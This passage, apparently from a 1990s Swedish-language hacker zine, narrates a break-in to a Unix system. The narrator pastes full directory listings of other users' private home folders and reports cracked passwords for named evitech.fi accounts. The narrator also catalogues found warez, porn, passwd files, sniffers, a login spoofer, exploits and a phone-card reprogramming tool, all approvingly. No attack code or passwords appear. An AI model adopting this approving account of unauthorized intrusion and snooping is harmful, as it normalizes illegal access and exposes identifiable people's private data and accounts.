som dojlde sig bakom nagra av filnamnen oxa.. Aven om de ar ratt sjalv forklarande.. guessed inneholl nagra crackade passwd's till evitech.fi. Det var tydligen crackat med Crack 4.1 kan jag ju oxa saga.. katjahmr inneholl passwordet till usern katjahmr pa evitech.fi.. (Ett annat password till samma konto fanns i guessed, sa de har antagligen bytt password at henne..) Ska well fortsatta, och kika lite pa vad pone kan dolja.. /private/pone: total 5274 -rw-r--r-- 1 pone nighteam 44156 Dec 20 15:32 #sit.fi.sorted# -rwx------ 1 pone nighteam 1399 Dec 4 09:00 %backup%~ drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 . drwxrwxr-x 4 root root 1024 Nov 26 20:27 .. -rwx------ 1 pone nighteam 1246 Jan 12 08:41 .addressbook -rw-r--r-- 1 pone nighteam 2573 Jan 12 08:41 .addressbook.lu -rw------- 1 pone nighteam 542 Dec 20 16:45 .article -rwx------ 1 pone nighteam 756 Dec 20 18:51 .cshrc -rwx------ 1 pone nighteam 733 Dec 2 13:51 .cshrc~ -rw-r--r-- 1 pone nighteam 15 Dec 20 13:01 .forward -rwx------ 1 pone nighteam 164 Jul 10 1995 .kermrc -rwx------ 1 pone nighteam 34 Jun 6 1993 .less -rwx------ 1 pone nighteam 114 Nov 24 1993 .lessrc -rw-r--r-- 1 pone nighteam 6 Nov 26 20:42 .logout -rwx------ 1 pone nighteam 25 Aug 14 03:12 .mailcap~ -rw-r--r-- 1 pone nighteam 0 Dec 20 08:53 .mc.ini -rw-r--r-- 1 pone nighteam 70 Dec 20 08:53 .mc.tree -rwx------ 1 pone nighteam 357 Aug 10 06:10 .netscape-bookmarks.html drwxr-xr-x 2 pone nighteam 11264 Nov 24 19:50 .netscape-cache -rwx------ 1 pone nighteam 91 Aug 10 06:10 .netscape-cookies -rwx------ 1 pone nighteam 12923 Aug 14 04:13 .netscape-history -rwx------ 1 pone nighteam 1568 Oct 23 20:22 .netscape-preferences -rwx------ 1 pone nighteam 0 Jan 12 13:46 .news_time -rw-r--r-- 1 pone nighteam 290356 Dec 20 19:39 .newsrc -rw-r--r-- 1 pone nighteam 259272 Oct 15 17:02 .newsrc.20926 -rw-r--r-- 1 pone nighteam 159420 Dec 20 16:47 .oldnewsrc drwxr-xr-x 2 pone nighteam 2048 Oct 29 20:11 .pics -rw-r--r-- 1 pone nighteam 5657 Jan 12 08:45 .pinerc -rw-r--r-- 1 pone nighteam 494 Aug 28 02:48 .plan -rw-r--r-- 1 pone nighteam 12 Aug 28 02:50 .project -rwx------ 1 pone nighteam 414 Dec 20 17:51 .signature -rwx------ 1 pone nighteam 415 Nov 17 12:27 .signature~ drwx------ 2 pone nighteam 1024 Sep 19 09:04 .term drwxr-xr-x 4 pone nighteam 1024 Dec 21 01:36 .tin -rwx------ 1 pone nighteam 89 Aug 7 22:08 .xinitrc -rw-r--r-- 1 pone nighteam 65792 Nov 16 22:44 690v100.img drwx------ 2 pone nighteam 1024 Jul 28 13:02 Mail drwx------ 2 pone nighteam 1024 Jul 28 13:02 News -rw-rw-r-- 1 pone nighteam 15262 Nov 21 14:26 PPP-HOWTO.gz -rw-r--r-- 1 pone nighteam 208339 Nov 21 19:38 alt.2600_FAQ,_Beta_.012_-_Part_1_1 -rw-r--r-- 1 pone nighteam 6133 Nov 21 19:38 alt.2600_Survival_Guide drwxrwxr-x 2 pone nighteam 1024 Nov 16 09:33 arlan dr-x------ 2 pone nighteam 1024 Nov 27 03:25 crontabs -rw-r--r-- 1 pone nighteam 3877 Jan 11 18:14 cute.fi -rw------- 1 pone bin 477 Dec 18 15:37 dead.letter drwxr-xr-x 4 pone nighteam 1024 Nov 24 11:28 docs drwxr-xr-x 4 pone nighteam 1024 Nov 30 20:32 download -rwx------ 1 pone nighteam 216 Nov 6 21:09 falm drwxr-xr-x 3 fear users 1024 Dec 11 16:02 fear -rwx------ 1 pone nighteam 485 Nov 20 18:17 fmasi -rwx------ 1 pone nighteam 485 Nov 20 18:16 fmasi~ -rwx------ 1 pone nighteam 238 Nov 6 21:21 fmm -rwx------ 1 pone nighteam 437 Nov 6 21:41 fpone -rw-r--r-- 1 pone nighteam 2076 Nov 1 20:18 homepage.html -rw-r--r-- 1 pone nighteam 2001 Nov 1 19:57 homepage.html~ drwxr-xr-x 13 pone nighteam 1024 Dec 2 15:31 html -rwx------ 1 pone nighteam 307 Dec 18 16:50 iafmail -rwx------ 1 pone nighteam 312 Dec 18 16:50 iafmail~ -rw-r--r-- 1 pone nighteam 856989 Nov 23 11:49 ingres04.tar.Z -rwx------ 1 pone nighteam 312 Nov 16 20:34 innomail -rwx------ 1 pone nighteam 301 Nov 16 20:33 innomail~ drwxr-xr-x 3 pone nighteam 1024 Jan 12 01:57 log -rw-r--r-- 1 pone nighteam 198 Dec 2 17:38 loggi -rw------- 1 pone nighteam 1535 Nov 29 11:21 loki drwxr-xr-x 2 pone nighteam 12288 Aug 25 13:30 lost+found drwx------ 2 pone nighteam 1024 Jan 12 08:54 mail -rwx------ 1 pone nighteam 588 Dec 2 13:43 masi -rwx------ 1 pone nighteam 586 Nov 27 09:48 masi~ drwxr-xr-x 2 pone nighteam 1024 Dec 2 18:10 matts -rw------- 1 pone nighteam 105106 Nov 28 17:50 mbox drwxr-xr-x 2 root root 1024 Nov 24 11:47 mqueue -rw------- 1 pone nighteam 1562829 Nov 24 20:38 nag.ps -rw------- 1 pone nighteam 1562833 Nov 24 20:37 nag.ps~ drwx------ 2 pone nighteam 1024 Aug 7 01:34 news drwxr-xr-x 7 nordman users 2048 Nov 28 14:55 nordman -rw-r--r-- 1 pone nighteam 1620 Jan 11 18:28 otech.fi drwx------ 2 pone nighteam 1024 Oct 15 16:51 passwd -rwx------ 1 pone nighteam 542 Nov 28 13:09 pone -rwx------ 1 pone nighteam 501 Nov 27 10:05 pone~ -rwx------ 1 pone nighteam 1435 Nov 27 03:05 q~ -rwxr--r-- 1 pone nighteam 1333 Nov 26 21:12 rooter -rwxr--r-- 1 pone nighteam 1333 Nov 26 21:10 rooter~ -rwxr-xr-x 1 pone nighteam 438 Oct 27 18:40 setter -rw-r--r-- 1 pone nighteam 44156 Dec 20 15:23 sit.fi -rw-r--r-- 1 pone nighteam 44156 Dec 20 15:27 sit.fi.sorted -rwx------ 1 pone nighteam 302 Jul 28 12:17 staffmail -rwx------ 1 pone nighteam 301 Nov 15 13:54 studmail -rwx------ 1 pone nighteam 302 Nov 15 13:54 studmail~ lrwxrwxrwx 1 pone nighteam 17 Dec 20 09:19 talk -> /usr/bin/talk.old drwx------ 2 pone nighteam 1024 Jan 12 18:57 temp drwx------ 4 pone nighteam 1024 Oct 15 16:53 texts -rw-r--r-- 1 pone nighteam 811 Dec 19 14:24 trlog Lite diverse passwd-filer fanns ju dar, blandannat.. I .pics fanns det porr.. (Onodigt att slosa utrymme i maget med en listning..) I download/win95/ fanns det en hel del w4r3z.. Hittar overhuvudtaget en hel del w4r3z och porr lite overallt.. Sa jag hoppar direkt vad jag hittar i hacking-vag.. /private/pone/passwd: total 5 drwx------ 2 pone nighteam 1024 Oct 15 16:51 . drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 .. -rw------- 1 pone nighteam 376 Oct 15 16:12 ftp.aragorn.uio.no -rw------- 1 pone nighteam 183 Oct 15 16:14 ftp.batnet.com Tja, dar fanns tva passwd-filer.. Som han har varit lam nog att ta via ftp.. Bada var fake passwd's.. Well, over till /private2 da.. /private2: total 22 drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 . drwxr-xr-x 20 root root 1024 Jan 10 11:37 .. drwxrwxr-x 2 ripper TheDudez 1024 Nov 22 11:10 Linux drwxrwx--- 4 paul TheDudez 1024 Jan 9 19:41 Stuff drwxrwx--- 4 paul TheDudez 5120 Jan 9 13:07 Warez drwxrwxr-x 2 kea TheDudez 1024 Dec 15 14:46 algdata -rwxrwx--- 1 kea TheDudez 396 Nov 28 13:25 htmler -rwxr-x--- 1 ripper TheDudez 410 Nov 28 13:16 htmler.old drwxr-xr-x 19 kea TheDudez 2048 Jan 12 18:27 kea drwxr-xr-x 3 paul TheDudez 1024 Nov 28 14:13 library drwxr-xr-x 23 paul TheDudez 2048 Jan 12 12:37 paul drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 phrack drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 ripper drwxr-xr-x 2 paul TheDudez 1024 Jan 12 12:57 santtu.dellas.ner.jag.orkar.JUH drwxr-xr-x 10 ted TheDudez 1024 Dec 28 19:06 ted Tja, som ni ser.. Warez igen.. I Stuff fanns bland annat en passwd-fil igen.. I Warez, inte sa ovantat warez... I kea, som verkar vara webadmin, fanns passwd-filer och crackade konton.. I paul fanns en massa porr, en del warez och en del passwd-filer.. Har ar vad som fanns i phrack.. /private2/phrack: total 22 drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 . drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 .. -rw-r--r-- 1 ripper TheDudez 3072 Feb 14 1995 anarch.zip drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:49 aotd drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 11:56 ati drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:58 btr drwxr-xr-x 2 ripper TheDudez 4096 Sep 26 12:20 cdc drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:34 dfp drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:35 fbi drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:39 informatik drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 12:52 kaos drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:58 lodcom drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 13:05 lol drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 13:44 misc En hel del hp-zines har de samlat pa sig.. Och i misc, en massa blandade hp-texter och utils.. Har ar ripper's dir.. /private2/ripper: total 1190 drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 . drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 .. drwxr-xr-x 4 ripper TheDudez 3072 Nov 14 18:25 ..html drwxr-xr-x 2 ripper TheDudez 1024 Sep 6 13:27 .LiCe drwxr-xr-x 2 ripper TheDudez 1024 Sep 7 17:41 .a -rw-r--r-- 1 ripper TheDudez 215 Sep 21 12:39 .addressbook -rw-r--r-- 1 ripper TheDudez 1492 Sep 21 12:39 .addressbook.lu -rw------- 1 ripper TheDudez 541 Dec 29 01:38 .article~ -rw-r--r-- 1 ripper TheDudez 41 Sep 21 19:55 .bash_history -rw-r--r-- 1 ripper TheDudez 846 Nov 21 15:52 .cshrc -rw-r--r-- 1 ripper TheDudez 846 Nov 9 20:50 .cshrc~ drwx------ 2 ripper TheDudez 1024 Jul 26 20:43 .elm -rw-r--r-- 1 ripper TheDudez 41 Jan 11 12:53 .forward -rw-r--r-- 1 ripper TheDudez 19 Jan 11 12:53 .forward_bara_forward -rw-r--r-- 1 root root 41 Jan 9 14:02 .forward_old -rw-r--r-- 1 ripper TheDudez 112 Jul 26 20:04 .ircrc -rw-r--r-- 1 ripper TheDudez 164 Jul 10 1995 .kermrc -rw-r--r-- 1 ripper TheDudez 34 Jun 6 1993 .less -rw-r--r-- 1 ripper TheDudez 114 Nov 24 1993 .lessrc -rw------- 1 ripper TheDudez 859 Jan 10 12:02 .letter~ -rw-r--r-- 1 ripper TheDudez 84 Aug 1 22:23 .login -rw-r--r-- 1 ripper TheDudez 0 Dec 29 01:55 .mc.ini -rw-r--r-- 1 ripper TheDudez 1328 Dec 29 01:55 .mc.tree drwxr-xr-x 2 ripper TheDudez 1024 Dec 27 00:00 .ncftp -rw------- 1 ripper TheDudez 0 Jan 12 17:06 .news_time -rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:09 .newsrc -rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:07 .oldnewsrc -rw-r--r-- 1 ripper TheDudez 5488 Jan 12 17:06 .pinerc -rw-r--r-- 1 ripper TheDudez 404 Sep 1 13:58 .plan drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 14:44 .procmail -rw-r--r-- 1 ripper TheDudez 152 Sep 26 14:50 .procmailrc -rw-r--r-- 1 ripper TheDudez 19 Aug 14 20:42 .project -rw-r--r-- 1 ripper TheDudez 408 Jan 12 17:06 .signature -rw-r--r-- 1 ripper TheDudez 465 Nov 9 20:48 .signature.old -rw-r--r-- 1 ripper TheDudez 405 Aug 25 08:04 .signature~ drwx------ 2 ripper TheDudez 1024 Sep 19 08:10 .term -rw------- 1 ripper TheDudez 639 Jul 29 06:07 .tia drwxr-xr-x 4 ripper TheDudez 1024 Jan 12 17:09 .tin drwxr-xr-x 12 ripper TheDudez 2048 Dec 28 21:54 Crack-4.1 -rw-r--r-- 1 ripper TheDudez 14939 Oct 30 07:18 Dip+SLiRP+CSLIP_v1.1 drwx------ 2 ripper TheDudez 1024 Sep 12 14:16 Mail drwxr-xr-x 2 ripper TheDudez 4096 Jan 12 17:09 News drwxr-x--- 2 ripper TheDudez 1024 Oct 31 17:29 bin drwxr-xr-x 3 ripper TheDudez 1024 Sep 19 17:23 cipher -rw-r--r-- 1 ripper TheDudez 770 Jan 9 13:08 crontab -rw-r--r-- 1 ripper TheDudez 812635 Dec 26 23:55 de220e.exe -rw-r--r-- 1 ripper TheDudez 819 Dec 28 21:45 dead.article -rw------- 1 ripper bin 1121 Oct 21 23:16 dead.letter drwxr-xr-x 2 ripper TheDudez 1024 Aug 14 20:56 dev drwxr-xr-x 4 ripper TheDudez 1024 Nov 30 15:32 html drwx------ 2 ripper TheDudez 1024 Jan 12 14:59 mail -rw-r--r-- 1 ripper TheDudez 3003 Sep 26 19:48 mailer drwxrwxr-x 2 ripper TheDudez 1024 Oct 26 15:53 mits drwxr-xr-x 3 ripper TheDudez 1024 Nov 9 17:57 nc drwxr-xr-x 2 ripper TheDudez 1024 Nov 24 21:42 net -rw-r--r-- 1 ripper TheDudez 101455 Sep 19 19:20 net-tools-1.2.0.tar.gz -rw-r--r-- 1 ripper TheDudez 396 Nov 9 20:47 output -rw------- 1 ripper TheDudez 682 Sep 26 14:34 passu -rw-r--r-- 1 ripper TheDudez 45056 Nov 6 11:37 passwd drwxrwxr-x 2 ripper TheDudez 2048 Jan 12 11:01 pics -rw-r--r-- 1 ripper TheDudez 95486 Sep 20 10:21 roots.net drwxr-xr-x 3 ripper TheDudez 1024 Aug 31 19:42 screen -rw-r--r-- 1 ripper TheDudez 8755 Sep 21 19:32 shcrack.c -rw-r--r-- 1 ripper TheDudez 9716 Sep 21 19:37 spoof.c -rw-r--r-- 1 ripper TheDudez 642 Sep 21 19:39 spoof.doc drwxr-xr-x 2 ripper TheDudez 1024 Dec 7 23:46 stuff -rw-r--r-- 1 ripper TheDudez 6155 Sep 28 16:31 sunny.sh -rwx------ 1 ripper TheDudez 2277 Nov 9 20:49 taggit -rw-r--r-- 1 ripper TheDudez 2002 Nov 9 20:33 tags drwxr-xr-x 2 ripper TheDudez 1024 Dec 5 15:19 test -rw-r--r-- 1 ripper TheDudez 21859 Nov 13 11:36 uucp.how Well, en login-spoof, sniffers, passwd-filer, exploits, porr, cracker-prog, crackade passwd-filer, en ratt fin samling dict-filer, krypterings-progs.. Heh, ripper skulle nastan kunna vara en av oss! :) Men.. Kanske inte precis vad man vill ha som sysadm.. I ripper's mail fanns lite ql info oxa.. Detaljerad beskrivning och pascal-src for att gora en smartcard-lasare, koppla in den till sin PC, och med programmet programmera om telefon-kort.. Programmet passade for kort fran Norge, Irland, Czech Republic (!?) och Finland.. Hehe.. Well, det fanns en hel del tvivelaktiga saker pa det har systemet..